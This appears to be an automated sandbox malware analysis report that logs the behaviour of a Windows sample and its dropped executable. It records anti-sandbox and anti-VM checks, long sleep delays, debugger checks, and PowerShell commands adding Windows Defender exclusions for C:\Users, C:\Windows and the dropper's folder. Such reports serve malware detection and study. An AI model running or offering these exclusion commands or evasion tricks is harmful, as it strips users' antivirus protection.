Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeBinary or memory string: DIR_WATCH.DLL
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeBinary or memory string: SBIEDLL.DLL
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeBinary or memory string: API_LOG.DLL
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.drBinary or memory string: EABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HS%S%SDELAYS.TMPWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION8
Source: C:\Users\user\Desktop\YYjRtxS70h.exeMemory allocated: 2A90000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 905Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6871Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1592Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2004Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7055Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2642Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1518Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 447Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7875Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1858Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 7484Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 7484Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 7480Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep count: 905 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep count: 350 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep count: 131 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep count: 6871 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep count: 1592 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep count: 2004 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep count: 212 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7004Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1744Thread sleep count: 7055 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6108Thread sleep count: 2642 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5728Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3152Thread sleep count: 1518 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3448Thread sleep count: 447 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5004Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1544Thread sleep count: 7875 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep count: 1858 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2472Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe TID: 2792Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeLast function: Thread delayed
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041E359 FindFirstFileA,FindFirstFileA,15_2_0041E359
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00420370 FindFirstFileA,FindFirstFileA,15_2_00420370
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042498B FindFirstFileA,FindFirstFileA,15_2_0042498B
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeThread delayed: delay time: 60000
Source: YYjRtxS70h.exe, 00000000.00000002.3411987903.0000000000E6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: YYjRtxS70h.exe, 00000000.00000002.3411987903.0000000000E6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\e
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: VMwareVMware
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000071E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
Source: YYjRtxS70h.exe, 00000000.00000002.3411987903.0000000000E6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040168C mov eax, dword ptr fs:[00000030h]15_2_0040168C
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004016AA test dword ptr fs:[00000030h], 00000068h15_2_004016AA
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004016BB mov eax, dword ptr fs:[00000030h]15_2_004016BB
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\spxzLeEJs
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'"Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\spxzLeEJsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\UsersJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\WindowsJump to behavior
